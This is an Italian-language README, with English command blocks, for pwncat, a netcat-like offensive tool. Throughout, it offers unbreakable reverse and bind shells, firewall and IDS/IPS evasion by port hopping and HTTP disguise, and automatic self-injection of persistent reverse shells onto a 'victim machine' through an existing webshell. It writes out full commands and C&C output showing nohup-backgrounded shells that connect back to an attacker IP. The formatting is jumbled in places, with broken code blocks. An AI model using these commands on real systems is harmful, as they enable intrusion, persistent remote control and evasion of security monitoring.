
pwncat - netcat potenziato con evasione di firewall, IDS/IPS, shell bind e reverse, shell auto-iniettante e magia del port forwarding - e completamente scriptabile con Python (PSE)
Documentazione | Installazione | TL;DR | Caratteristiche | Comportamento | Utilizzo | Esempi | FAQ | Contribuire | Disclaimer | Licenza
Netcat potenziato con bypass di Firewall, IDS/IPS, shell bind e reverse, shell auto-iniettante e magia di port forwarding - e completamente scriptabile con Python (PSE). - docs.pwncat.org
[1] Copertura dei tipi mypy (completamente tipizzato: 94,00%)
[2] Build falliti non indicano funzionalità danneggiate. I test di integrazione durano molte ore e si interrompono sporadicamente per vari motivi (timeout di rete, cancellazioni sconosciute delle GitHub Actions, ecc.): #735, #841
Mai premuto accidentalmente Ctrl+c sulla tua reverse shell e l'hai persa per sempre?
Mai aspettato all'infinito che il tuo client si riconnettesse, perché il Firewall non lo lasciava uscire?
Mai avuto una perdita di connessione perché un IPS ha chiuso porte sospette?
Mai avuto bisogno di un veloce port forwarding?
Questo strumento ti copre.
Oltre a ciò, le attuali funzionalità di nc, ncat o socat non soddisfacevano le mie esigenze e volevo anche avere un unico strumento che funzionasse su macchine vecchie e nuove (da qui la compatibilità Python 2+3). Ancora più importante, volevo averlo in un linguaggio che potessi capire e con cui poter fornire le mie personalizzazioni. (Aspettatevelo, le versioni binarie per Linux, MacOS e Windows arriveranno presto).
Versione corrente: 0.1.2
| Pip |
|---|
![]() |
pip install pwncat |
[1]: Repository Epel
[2]: Instabile
Questa è solo una rapida panoramica per iniziare. Per tecniche più avanzate vedi 💻 Utilizzo o 💡 Esempi.
curl https://raw.githubusercontent.com/cytopia/pwncat/master/bin/pwncat | base64
echo "" | base64 -d > pwncat chmod +x pwncat
### Inietta nel target```bash
# [1] If you found a vulnerability on the target to start a very simple reverse shell,
# such as via bash, php, perl, python, nc or similar, you can instruct your local
# pwncat listener to use this connection to deploy itself on the target automatically
# and start an additional unbreakable reverse shell back to you.
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445
pwncat -l -e '/bin/bash' 8080 -k
```bash
# Reverse shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
# Reverse UDP shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1
pwncat -z 10.0.0.1 80,443,8080 pwncat -z 10.0.0.1 1-65535 pwncat -z 10.0.0.1 1+1023
pwncat -z 10.0.0.1 80,443,8080 -u pwncat -z 10.0.0.1 1-65535 -u pwncat -z 10.0.0.1 1+1023 -u
pwncat -z 10.0.0.1 1-65535 -4 pwncat -z 10.0.0.1 1-65535 -6 -u
pwncat -z 10.0.0.1 1-65535 --banner
### Port forwarding locale `-L` (proxy in ascolto)```bash
# Make remote MySQL server (remote port 3306) available on current machine
# on every interface on port 5000
pwncat -L 0.0.0.0:5000 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -L 0.0.0.0:5000 everythingcli.org 3306 -u
-R (proxy doppio client)```bashpwncat -R 10.0.0.1:4444 everythingcli.org 3306
```bash
# Same, but convert traffic on your end to UDP
pwncat -R 10.0.0.1:4444 everythingcli.org 3306 -u
SSH Tunnelling per divertimento e profitto 🔗
pwncatesempio: Port forwarding magic
pwncat ha molte funzionalità, di seguito è riportata solo una lista delle caratteristiche più notevoli.
*La funzionalità è attualmente in sviluppo.
Come l'implementazione originale di netcat, quando si utilizza TCP, pwncat
(in modalità client e ascolto) uscirà automaticamente se la connessione di rete è stata terminata,
propriamente o impropriamente.
Nel caso in cui il peer remoto non termini la connessione, o in modalità UDP, netcat e pwncat rimarranno aperti. Il comportamento differisce leggermente quando STDIN viene chiuso.
netcat: Se STDIN è chiuso, ma la connessione rimane aperta, netcat rimarrà apertopwncat: Se STDIN è chiuso, ma la connessione rimane aperta, pwncat si chiuderàPuoi emulare il comportamento di netcat con l'argomento da riga di comando --no-shutdown.
Dai un'occhiata ai seguenti comandi per comprendere meglio questo comportamento:```bash
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80 --no-shutdown
No content provided. No output.```bash
# [Invalid HTTP request] Quits, because the web server closes the connection and STDIN is EOF
printf "GET / \n\n" | pwncat www.google.com 80
INPUT:```bash
pwncat -l 4444 > output.txt pwncat localhost 4444 < input.txt
pwncat -l 4444 --no-shutdown > output.txt pwncat localhost 4444 --no-shutdown < input.txt
Si avvisa che non è affidabile inviare file tramite UDP```bash
# [UDP] (--no-shutdown has no effect, as this is the default behaviour in UDP)
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will still stay open in UDP mode.
pwncat -u -l 4444 > output.txt
pwncat -u localhost 4444 < input.txt
Ci sono molti modi per modificare questo comportamento predefinito. Dai un'occhiata alla sezione utilizzo per impostazioni più avanzate.
[1] Funziona solo quando non si usano
--no-shutdowne--keep. Quindi chiuderà il suo socket per l'invio, segnalando la fine remota e EOF sul suo socket.
Digita pwncat -h o clicca qui sotto per vedere tutte le opzioni disponibili.
Enhanced and compatible Netcat implementation written in Python (2 and 3) with connect, zero-i/o, listen and forward modes and techniques to detect and evade firewalls and intrusion detection/prevention systems.
If no mode arguments are specified, pwncat will run in connect mode and act as a client to connect to a remote endpoint. If the connection to the remote endoint is lost, pwncat will quit. See options for how to automatically re- connect.
positional arguments: hostname Address to listen, forward, scan or connect to.
port [All modes] Single port to listen, forward or connect to. [Zero-I/O mode] Specify multiple ports to scan: Via list: 4444,4445,4446 Via range: 4444-4446 Via incr: 4444+2
mode arguments: -l, --listen [Listen mode]: Start a server and listen for incoming connections. If using TCP and a connected client disconnects or the connection is interrupted otherwise, the server will quit. See -k/--keep-open to change this behaviour.
-z, --zero [Zero-I/0 mode]: Connect to a remote endpoint and report status only. Used for port scanning. See --banner for version detection.
-L [addr:]port, --local [addr:]port [Local forward mode]: This mode will start a server and a client internally. The internal server will listen locally on specified addr/port (given by --local [addr:]port). The server will then forward traffic to the internal client which connects to another server specified by hostname/port given via positional arguments. (I.e.: proxies a remote service to a local address)
-R addr:port, --remote addr:port [Remote forward mode]: This mode will start two clients internally. One is connecting to the target and one is connecting to another pwncat/netcat server you have started some- where. Once connected, it will then proxy traffic between you and the target. This mode should be applied on machines that block incoming traffic and only allow outbound. The connection to your listening server is given by -R/--remote addr:port and the connection to the target machine via the positional arguments.
optional arguments: -e cmd, --exec cmd Execute shell command. Only for connect or listen mode.
-C lf, --crlf lf Specify, 'lf', 'crlf' or 'cr' to always force replacing line endings for input and outout accordingly. Specify 'no' to completely remove any line feeds. By default it will not replace anything and takes what is entered (usually CRLF on Windows, LF on Linux and some times CR on MacOS).
-n, --nodns Do not resolve DNS.
--send-on-eof Buffer data received on stdin until EOF and send everything in one chunk.
| Stile del codice | Test di integrazione [2] |
|---|
|
| Documentazione di pwncat | Link |
|---|
| Documentazione ufficiale | https://docs.pwncat.org |
| Sito ufficiale | https://pwncat.org |
| Documentazione API | https://pwncat.org/pwncat.api.html |
| Pwncat Scripting Engine | PSE |
| MacOS | Arch Linux | BlackArch | CentOS[1] |
|---|
![]() | |||
brew install pwncat | yay -S pwncat | pacman -S pwncat | yum install pwncat |
| Fedora | Kali Linux | NixOS[2] | Oracle Linux[1] |
dnf install pwncat | apt install pwncat | nixos.pwncat | yum install pwncat |
| Pentoo | Parrot OS | ||
net-analyzer/pwncat | apt install pwncat |
Shell reverse indistruttibili - più shell
|
| Funzionalità | Descrizione |
|---|
| PSE | Completamente scriptabile con Pwncat Scripting Engine per consentire ogni tipo di funzionalità avanzata in invio e ricezione |
| port scanning | Scansione porte TCP e UDP con supporto base per il rilevamento della versione |
| Self-injecting rshell | Modalità di auto-iniezione per distribuirsi e avviare automaticamente una reverse shell indistruttibile verso di te |
| Bind shell | Crea bind shell |
| Reverse shell | Crea reverse shell |
| Port Forward | Port forwarding locale e remoto (Server/Client proxy) |
| Ctrl+c | Reverse shell può riconnettersi se premi accidentalmente Ctrl+c |
| Detect Egress | Scansiona e segnala le porte egress aperte sul target (port hopping) |
| Evade FW | Elude i firewall egress tramite round-robin sulle porte in uscita (port hopping) |
| Evade IPS | Elude i sistemi di prevenzione delle intrusioni (IPS) essendo in grado di utilizzare round-robin sulle porte in uscita in caso di interruzioni di connessione (port hopping) |
| UDP rev shell | Provatelo con il tradizionale netcat |
| Stateful UDP | Fase di connessione stateful per la modalità client UDP |
| TCP / UDP | Supporto completo TCP e UDP |
| IPv4 / IPv6 | Supporto dual o single stack IPv4 e IPv6 |
| Python 2+3 | Funziona con Python 2, Python 3, pypy2 e pypy3 |
| Cross OS | Funziona su Linux, MacOS e Windows purché Python sia disponibile |
| Compatibilità | Usa netcat, ncat o socat come client o server insieme a pwncat |
| Portabile | Singolo file che utilizza solo pacchetti core - nessuna dipendenza esterna richiesta. |
| pwncat | netcat | ncat | socat |
|---|
| Scripting engine | ✔ Python | ❌ | ✔ Lua | ❌ |
| IP ToS | ✔ | ✔ | ❌ | ✔ |
| IPv4 | ✔ | ✔ | ✔ | ✔ |
| IPv6 | ✔ | ✔ | ✔ | ✔ |
| Unix domain sockets | ❌ | ✔ | ✔ | ✔ |
| Linux vsock | ❌ | ❌ | ✔ | ❌ |
| Socket source bind | ✔ | ✔ | ✔ | ✔ |
| TCP | ✔ | ✔ | ✔ | ✔ |
| UDP | ✔ | ✔ | ✔ | ✔ |
| SCTP | ❌ | ❌ | ✔ | ✔ |
| SSL | ❌ | ❌ | ✔ | ✔ |
| HTTP | ✔ | ❌ | ❌ | ❌ |
| HTTPS | * | ❌ | ❌ | ❌ |
| Telnet negotiation | ❌ | ✔ | ✔ | ❌ |
| Proxy support | ❌ | ✔ | ✔ | ✔ |
| Local port forward | ✔ | ❌ | ❌ | ✔ |
| Remote port forward | ✔ | ❌ | ❌ | ❌ |
| Inbound port scan | ✔ | ✔ | ✔ | ❌ |
| Outbound port scan | ✔ | ❌ | ❌ | ❌ |
| Version detection | ✔ | ❌ | ❌ | ❌ |
| Chat | ✔ | ✔ | ✔ | ✔ |
| Command execution | ✔ | ✔ | ✔ | ✔ |
| Hex dump | * | ✔ | ✔ | ✔ |
| Broker | ❌ | ❌ | ✔ | ❌ |
| Simultaneous conns | ❌ | ❌ | ✔ | ✔ |
| Allow/deny | ❌ | ❌ | ✔ | ✔ |
| Re-accept | ✔ | ✔ | ✔ | ✔ |
| Self-injecting | ✔ | ❌ | ❌ | ❌ |
| UDP reverse shell | ✔ | ❌ | ❌ | ❌ |
| Respawning client | ✔ | ❌ | ❌ | ❌ |
| Port hopping | ✔ | ❌ | ❌ | ❌ |
| Emergency shutdown | ✔ | ❌ | ❌ | ❌ |
| Comportamento | ![]() | ![]() | ![]() |
|---|
| Esci (SIGINT) | Ctrl+c | Ctrl+c | Ctrl+c |
| Esci (SIGQUIT) | Ctrl+\ | ? | ? |
| Esci (SIGQUIT) | Ctrl+4 | ? | ? |
| Esci STDIN[1] | Ctrl+d | Ctrl+d | Ctrl+z e Ctrl+Invio |
| Invia (NL) | Ctrl+j | ? | ? |
| Invia (EOL) | Ctrl+m | ? | ? |
| Invia (EOL) | Invio | Invio | Invio |
--no-shutdown Do not shutdown into half-duplex mode. If this option is passed, pwncat won't invoke shutdown on a socket after seeing EOF on stdin. This is provided for backward-compatibility with OpenBSD netcat, which exhibits this behavior.
-v, --verbose Be verbose and print info to stderr. Use -v, -vv, -vvv or -vvvv for more verbosity. The server performance will decrease drastically if you use more than three times.
--info type Show additional info about sockets, IPv4/6 or TCP opts applied to the current socket connection. Valid parameter are 'sock', 'ipv4', 'ipv6', 'tcp' or 'all'. Note, you must at least be in INFO verbose mode in order to see them (-vv).
-c str, --color str Colored log output. Specify 'always', 'never' or 'auto'. In 'auto' mode, color is displayed as long as the output goes to a terminal. If it is piped into a file, color will automatically be disabled. This mode also disables color on Windows by default. (default: auto)
--safe-word str All modes: If pwncat is started with this argument, it will shut down as soon as it receives the specified string. The --keep-open (server) or --reconn (client) options will be ignored and it won't listen again or reconnect to you. Use a very unique string to not have it shut down accidentally by other input.
protocol arguments: -4 Only Use IPv4 (default: IPv4 and IPv6 dualstack).
-6 Only Use IPv6 (default: IPv4 and IPv6 dualstack).
-u, --udp Use UDP for the connection instead of TCP.
-T str, --tos str Specifies IP Type of Service (ToS) for the connection. Valid values are the tokens 'mincost', 'lowcost', 'reliability', 'throughput' or 'lowdelay'.
--http Connect / Listen mode (TCP and UDP): Hide traffic in http packets to fool Firewalls/IDS/IPS.
--https Connect / Listen mode (TCP and UDP): Hide traffic in https packets to fool Firewalls/IDS/IPS.
-H [str [str ...]], --header [str [str ...]] Add HTTP headers to your request when using --http(s).
command & control arguments: --self-inject cmd:host:port[s] Listen mode (TCP only): If you are about to inject a reverse shell onto the victim machine (via php, bash, nc, ncat or similar), start your listening server with this argument. This will then (as soon as the reverse shell connects) automatically deploy and background-run an unbreakable pwncat reverse shell onto the victim machine which then also connects back to you with specified arguments. Example: '--self-inject /bin/bash:10.0.0.1:4444' It is also possible to launch multiple reverse shells by specifying multiple ports. Via list: --self-inject /bin/sh:10.0.0.1:4444,4445,4446 Via range: --self-inject /bin/sh:10.0.0.1:4444-4446 Via incr: --self-inject /bin/sh:10.0.0.1:4444+2 Note: this is currently an experimental feature and does not work on Windows remote hosts yet.
pwncat scripting engine: --script-send file All modes (TCP and UDP): A Python scripting engine to define your own custom transformer function which will be executed before sending data to a remote endpoint. Your file must contain the exact following function which will: be applied as the transformer: def transform(data, pse): # NOTE: the function name must be 'transform' # NOTE: the function param name must be 'data' # NOTE: indentation must be 4 spaces # ... your transformations goes here return data You can also define as many custom functions or classes within this file, but ensure to prefix them uniquely to not collide with pwncat's function or classes, as the file will be called with exec().
--script-recv file All modes (TCP and UDP): A Python scripting engine to define your own custom transformer function which will be executed after receiving data from a remote endpoint. Your file must contain the exact following function which will: be applied as the transformer: def transform(data, pse): # NOTE: the function name must be 'transform' # NOTE: the function param name must be 'data' # NOTE: indentation must be 4 spaces # ... your transformations goes here return data You can also define as many custom functions or classes within this file, but ensure to prefix them uniquely to not collide with pwncat's function or classes, as the file will be called with exec().
zero-i/o mode arguments: --banner Zero-I/O (TCP and UDP): Try banner grabbing during port scan.
listen mode arguments: -k, --keep-open Listen mode (TCP only): Re-accept new clients in listen mode after a client has disconnected or the connection is interrupted otherwise. (default: server will quit after connection is gone)
--rebind [x] Listen mode (TCP and UDP): If the server is unable to bind, it will re-initialize itself x many times before giving up. Omit the quantifier to rebind endlessly or specify a positive integer for how many times to rebind before giving up. See --rebind-robin for an interesting use-case. (default: fail after first unsuccessful try).
--rebind-wait s Listen mode (TCP and UDP): Wait x seconds between re-initialization. (default: 1)
--rebind-robin port Listen mode (TCP and UDP): If the server is unable to initialize (e.g: cannot bind and --rebind is specified, it it will shuffle ports in round-robin mode to bind to. Use comma separated string such as '80,81,82,83', a range of ports '80-83' or an increment '80+3'. Set --rebind to at least the number of ports to probe +1 This option requires --rebind to be specified.
connect mode arguments: --source-addr addr Specify source bind IP address for connect mode.
--source-port port Specify source bind port for connect mode.
--reconn [x] Connect mode (TCP and UDP): If the remote server is not reachable or the connection is interrupted, the client will connect again x many times before giving up. Omit the quantifier to retry endlessly or specify a positive integer for how many times to retry before giving up. (default: quit if the remote is not available or the connection was interrupted) This might be handy for stable TCP reverse shells ;-) Note on UDP: By default UDP does not know if it is connected, so it will stop at the first port and assume it has a connection. Consider using --udp-sconnect with this option to make UDP aware of a successful connection.
--reconn-wait s Connect mode (TCP and UDP): Wait x seconds between re-connects. (default: 1)
--reconn-robin port Connect mode (TCP and UDP): If the remote server is not reachable or the connection is interrupted and --reconn is specified, the client will shuffle ports in round-robin mode to connect to. Use comma separated string such as '80,81,82,83', a range of ports '80-83' or an increment '80+3'. Set --reconn to at least the number of ports to probe +1 This helps reverse shell to evade intrusiona prevention systems that will cut your connection and block the outbound port. This is also useful in Connect or Zero-I/O mode to figure out what outbound ports are allowed.
--ping-init Connect mode (TCP and UDP): UDP is a stateless protocol unlike TCP, so no hand- shake communication takes place and the client just sends data to a server without being "accepted" by the server first. This means a server waiting for an UDP client to connect to, is unable to send any data to the client, before the client hasn't send data first. The server simply doesn't know the IP address before an initial connect. The --ping-init option instructs the client to send one single initial ping packet to the server, so that it is able to talk to the client. This is a way to make a UDP reverse shell work. See --ping-word for what char/string to send as initial ping packet (default: '\0')
--ping-intvl s Connect mode (TCP and UDP): Instruct the client to send ping intervalls every s sec. This allows you to restart your UDP server and just wait for the client to report back in. This might be handy for stable UDP reverse shells ;-) See --ping-word for what char/string to send as initial ping packet (default: '\0')
--ping-word str Connect mode (TCP and UDP): Change the default character '\0' to use for upd ping. Single character or strings are supported.
--ping-robin port Connect mode (TCP and UDP): Instruct the client to shuffle the specified ports in round-robin mode for a remote server to ping. This might be handy to scan outbound allowed ports. Use comma separated string such as '80,81,82,83', a range of ports '80-83' or an increment '80+3'. Use --ping-intvl 0 to be faster.
--udp-sconnect Connect mode (UDP only): Emulating stateful behaviour for UDP connect phase by sending an initial packet to the server to validate if it is actually connected. By default, UDP will simply issue a connect and is not aware if it is really connected or not. The default connect packet to be send is '\0', you can change this with --udp-sconnect-word.
--udp-sconnect-word [str] Connect mode (UDP only): Change the the data to be send for UDP stateful connect behaviour. Note you can also omit the string to send an empty packet (EOF), but be aware that some servers such as netcat will instantly quit upon receive of an EOF packet. The default is to send a null byte sting: '\0'.
misc arguments: -h, --help Show this help message and exit -V, --version Show version information and exit
</details>
## :bulb: Esempi
### Aggiorna la tua shell a interattiva
<!--
<details>
<summary>Click to expand</summary>
-->
> Questo è un consiglio universale e non funziona solo con `pwncat`, ma con tutti gli altri strumenti comuni.
Quando connesso con una shell reverse o bind, noterai che nessun comando interattivo funzionerà e premere <kbd>Ctrl</kbd>+<kbd>c</kbd> terminerà la tua sessione. Per risolvere, dovrai collegarla a un TTY (renderla interattiva). Ecco come:```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+z```bash
stty size
stty raw -echo fg
stty raw -echo; fg
reset export SHELL=bash export TERM=xterm stty rows columns # and values found above by 'stty size'
> <sup>[1] [Reverse Shell Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#spawn-tty-shell)</sup>
### Shell inversa UDP
Senza trucchi, una shell inversa UDP non è realmente possibile. UDP è un protocollo senza stato rispetto a TCP e non ha un metodo `connect()` come TCP.
In modalità TCP, il server conoscerà l'IP e la porta del client, una volta che il client esegue un `connects()`.
In modalità UDP, poiché non esiste `connect()`, il client invia semplicemente dati a un indirizzo/porta senza doversi connettere prima.
Pertanto, in modalità UDP, il server non sarà in grado di conoscere l'IP e la porta del client e quindi non può inviargli dati per primo.
L'unico modo per rendere ciò possibile è far sì che il client invii qualche tipo di dati al server per primo, in modo che il server possa vedere quale IP/porta ha inviato dati.
`pwncat` emula il `connect()` TCP facendo sì che il client invii un byte nullo al server una volta o periodicamente tramite `--ping-intvl` o `--ping-init`.```bash
# The client
# --exec # Provide this executable
# --udp # Use UDP mode
# --ping-init # Send an initial null byte to the server
pwncat --exec /bin/bash --udp --ping-init 10.0.0.1 4444
Perché unbreakable? Perché continuerà a tornare da te, anche se interrompi temporaneamente il tuo server di ascolto. In altre parole, il client continuerà a tentare di connettersi al server specificato fino al successo. Se la connessione viene interrotta, continuerà a riprovare.```bash
pwncat --exec /bin/bash --nodns --reconn --reconn-wait 2 10.0.0.1 4444
### Reverse shell UDP indistruttibile
Perché indistruttibile? Perché continuerà a tornare da te, anche se uccidi temporaneamente il tuo server in ascolto. In altre parole, il client continuerà a inviare byte nulli al server per annunciarsi costantemente.```bash
# The client
# --exec # Provide this executable
# --nodns # Keep the noise down and don't resolve hostnames
# --udp # Use UDP mode
# --ping-intvl # Ping the server every 2 seconds
pwncat --exec /bin/bash --nodns --udp --ping-intvl 2 10.0.0.1 4444
Immaginiamo di essere in grado di creare una reverse shell molto semplice e instabile dal target alla propria macchina, come una web shell tramite uno script PHP o simile. Sapendo che questa non durerà a lungo o potrebbe rompersi a causa di una connessione di rete instabile, si potrebbe usare pwncat per agganciarsi a questa connessione e distribuirsi in modo indistruttibile sul target, in modo completamente automatico.
Tutto ciò che devi fare è usare pwncat come listener locale e avviarlo con l'opzione --self-inject. Non appena il client (ad esempio: la reverse web shell) si connette ad esso, eseguirà una serie di operazioni:
Una volta fatto ciò, puoi continuare a usare la connessione corrente o semplicemente abbandonarla e avviare un nuovo listener (sì, non è necessario avviare il listener prima di avviare la reverse shell) in modo che il nuovo client pwncat si connetta a te. Inoltre, il nuovo listener non deve essere pwncat, può essere anche netcat o ncat.
L'opzione --self-inject:```bash
pwncat -l 4444 --self-inject ::
* `<cmd>`: Questo è il comando da avviare sul target (come `-e`/`--exec`, quindi vuoi che sia `cmd.exe` o `/bin/bash`)
* `<host>`: Questo è per la tua macchina locale, l'indirizzo IP a cui la reverse shell si riconnetterà
* `<port>`: Questo è per la tua macchina locale, la porta a cui la reverse shell si riconnetterà
Quindi immagina che la tua macchina Kali sia 10.0.0.1. Dai istruzioni alla tua webshell che inietti su un server Linux di connettersi a te sulla porta `4444`:```bash
# Start this locally, before starting the reverse webshell
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445
Vedrai quindi qualcosa del genere:``` [PWNCAT CnC] Probing for: /bin/python [PWNCAT CnC] Probing for: /bin/python2 [PWNCAT CnC] Probing for: /bin/python2.7 [PWNCAT CnC] Probing for: /bin/python3 [PWNCAT CnC] Probing for: /bin/python3.5 [PWNCAT CnC] Probing for: /bin/python3.6 [PWNCAT CnC] Probing for: /bin/python3.7 [PWNCAT CnC] Probing for: /bin/python3.8 [PWNCAT CnC] Probing for: /usr/bin/python [PWNCAT CnC] Potential path: /usr/bin/python [PWNCAT CnC] Found valid Python2 version: 2.7.16 [PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us [PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT [PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422) [PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &
E sei a posto. Ora puoi avviare un altro listener localmente sulla porta `4445` (di nuovo, si collegherà a te all'infinito, quindi non è necessario avviare il listener per primo).```bash
# either netcat
nc -lp 4445
# or ncat
ncat -l 4445
# or pwncat
pwncat -l 4445
Invece di richiedere una singola reverse shell auto-iniettante, puoi istruire pwncat per generare tutte le reverse shell indistruttibili che desideri, che si riconnettono a te.
L'argomento --self-inject ti permette non solo di definire una singola porta, ma anche
4445,4446,4447,44484446-44484445+3Per generare 4 reverse shell, avvieresti il tuo listener proprio come descritto sopra, ma invece di una singola porta, ne definisci multiple:```bash
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445,4446,4447,4448
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445-4448
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445+3
Ciascuno dei tre comandi sopraindicati otterrà lo stesso comportamento: generare 4 shell inversi all'interno del target. Una volta che il client si connette, l'output apparirà simile a questo:```
[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Potential path: /usr/bin/python
[PWNCAT CnC] Found valid Python2 version: 2.7.16
[PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us
[PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT
[PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422)
[PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4446 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4447 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4448 &
Nota: Assicurati di avere una reverse shell che continui a tornare. In questo modo potrai sempre modificare le impostazioni di registrazione senza perdere la shell.
Se lo desideri, puoi avviare un listener in modalità di registrazione TRACE completa per capire cosa sta succedendo o semplicemente per risolvere problemi.
I messaggi di log sono colorati in base alla loro gravità. I colori vengono automaticamente disattivati se stderr non è un pty, ad esempio se si reindirizza l'output su un file.
Puoi anche disabilitare manualmente la registrazione a colori per output su terminale tramite l'opzione --color.```bash
pwncat -vvvv -l 4444
Vedrai (tra tutta la roba incomprensibile) un messaggio TRACE:```bash
2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744'
2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744
2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining)
2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output
Non appena hai visto ciò sul listener, puoi inviare comandi al client. Tutti i messaggi di debug non sono necessari, quindi puoi tranquillamente Ctrl+kbd> terminare il tuo server e avviarlo di nuovo in modalità silenziosa:```bash pwncat -l 4444
Ora attendi al massimo qualche secondo, a seconda dell'intervallo con cui il client torna da te, e il gioco è fatto: la tua sessione è di nuovo senza log.
Non avere alcun messaggio informativo, a volte, non è desiderabile. Potresti voler sapere cosa succede dietro le quinte, o no? Termina in sicurezza il tuo server con <kbd>Ctrl</kbd>+<kbd>c</kbd> e reindirizza le notifiche verso un file di log:```bash
pwncat -l -vvv 4444 2> comm.txt
Ora tutto ciò che vedrai nella tua sessione terminale sono gli input e gli output effettivi dei comandi.
Se vuoi vedere cosa succede dietro le quinte, apri una seconda finestra del terminale e esegui il tail
del file comm.txt:```bash
tail -fn50 comm.txt
2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744' 2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n' 2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n' 2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744 2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n' 2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining) 2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output
#### Informazioni sui socket
Un'altra funzionalità utile è la visualizzazione delle impostazioni correnti dei socket e di rete.
Utilizza l'opzione `--info` con `socket`, `ipv4`, `ipv6`, `tcp` o `all` per mostrare tutte
le impostazioni disponibili.
**Nota:** Per visualizzare queste impostazioni, devi essere almeno al livello di log `INFO` (`-vv`).
Un esempio di output in modalità IPv4/TCP senza impostazioni personalizzate è mostrato di seguito:```
INFO: [bind-sock] Sock: SO_DEBUG: 0
INFO: [bind-sock] Sock: SO_ACCEPTCONN: 1
INFO: [bind-sock] Sock: SO_REUSEADDR: 1
INFO: [bind-sock] Sock: SO_KEEPALIVE: 0
INFO: [bind-sock] Sock: SO_DONTROUTE: 0
INFO: [bind-sock] Sock: SO_BROADCAST: 0
INFO: [bind-sock] Sock: SO_LINGER: 0
INFO: [bind-sock] Sock: SO_OOBINLINE: 0
INFO: [bind-sock] Sock: SO_REUSEPORT: 0
INFO: [bind-sock] Sock: SO_SNDBUF: 16384
INFO: [bind-sock] Sock: SO_RCVBUF: 131072
INFO: [bind-sock] Sock: SO_SNDLOWAT: 1
INFO: [bind-sock] Sock: SO_RCVLOWAT: 1
INFO: [bind-sock] Sock: SO_SNDTIMEO: 0
INFO: [bind-sock] Sock: SO_RCVTIMEO: 0
INFO: [bind-sock] Sock: SO_ERROR: 0
INFO: [bind-sock] Sock: SO_TYPE: 1
INFO: [bind-sock] Sock: SO_PASSCRED: 0
INFO: [bind-sock] Sock: SO_PEERCRED: 0
INFO: [bind-sock] Sock: SO_BINDTODEVICE: 0
INFO: [bind-sock] Sock: SO_PRIORITY: 0
INFO: [bind-sock] Sock: SO_MARK: 0
INFO: [bind-sock] IPv4: IP_OPTIONS: 0
INFO: [bind-sock] IPv4: IP_HDRINCL: 0
INFO: [bind-sock] IPv4: IP_TOS: 0
